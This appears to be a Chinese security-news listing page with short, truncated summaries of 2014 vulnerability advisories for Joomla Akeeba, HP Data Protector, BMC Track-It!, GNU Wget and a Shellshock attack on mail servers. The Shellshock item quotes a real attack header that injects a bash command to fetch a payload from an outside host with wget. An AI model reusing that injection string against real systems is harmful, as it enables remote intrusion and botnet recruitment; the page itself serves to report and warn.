Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器 软件资源

软件开发小程序制作系统集成与运维空间租用硬件开发视频监控技术咨询与支持——联系电话:0311-88999002/88999003

首页 / 操作系统 / Linux

Joomla Akeeba Kickstart反序列化远程代码执行漏洞

Joomla Akeeba Kickstart反序列化远程代码执行漏洞

发布日期:2014-08-24更新日期:2014-10-24受影响系统:Joomla! Akeeba描述:CVE(CAN) ID: CVE-2014-7228Joomla Akeeba是负责Joomla!更新的组件。Joomla! 2.5.25之前版本、3.2.5及之前版本、3.3.0至3.3.4版本在实现上存在安全漏洞,此漏洞仅可在Joomla! CMS更新时利用。成功利用后导致远程代码执行。<*来源:vendor*>建议:厂商补丁:Joom...
HP Data Protector EXEC_INTEGUTIL远程代码执行漏洞

HP Data Protector EXEC_INTEGUTIL远程代码执行漏洞

发布日期:2014-10-21更新日期:2014-10-24受影响系统:HP Data Protector 9描述:HP OpenView Storage Data Protector软件是企业环境中单个服务器自动备份和恢复的软件,支持磁盘存储或磁带存储目标。HP Data Protector 9在处理EXEC_INTEGUTIL消息时会触发Backup client服务内的漏洞,该服务默认监听在TCP/555上,成功利用此漏洞后可利用EXEC_INTEG...
Numara/BMC Track-It! /TrackItWeb/Attachment页任意文件下载漏洞

Numara/BMC Track-It! /TrackItWeb/Attachment页任意文件下载漏洞

发布日期:2014-10-21更新日期:2014-10-26受影响系统:BMC Track-It! 11.3.0.355描述:CVE(CAN) ID: CVE-2014-4874BMC Track-It!是集成的IT帮助桌面和资产管理解决方案。BMC Track-It! 11.3.0.355版本/TrackItWeb/Attachment页在实现上存在任意文件下载漏洞,经过身份验证的远程用户利用此漏洞可下载任意文件。<*来源:Pedro Ribeir...
攻击者利用Shellshock漏洞入侵邮件服务器

攻击者利用Shellshock漏洞入侵邮件服务器

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是: Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/...
GNU Wget符号链接漏洞(CVE-2014-4877)

GNU Wget符号链接漏洞(CVE-2014-4877)

发布日期:2014-10-27更新日期:2014-10-29受影响系统:GNU wget描述:BUGTRAQ ID: 70751CVE(CAN) ID: CVE-2014-4877GNU Wget是一个免费的软件包,用于使用HTTP、HTTPS和FTP协议检索文件。GNU Wget在实现上存在符号链接漏洞,攻击者可利用此漏洞访问受限制目录以外的文件,获取敏感信息,执行其他攻击。Linux wget命令详解 http://www.linuxidc.com/L...
<< 2881 2882 2883 2884 2885 2886 2887 2888 2889 2890 >>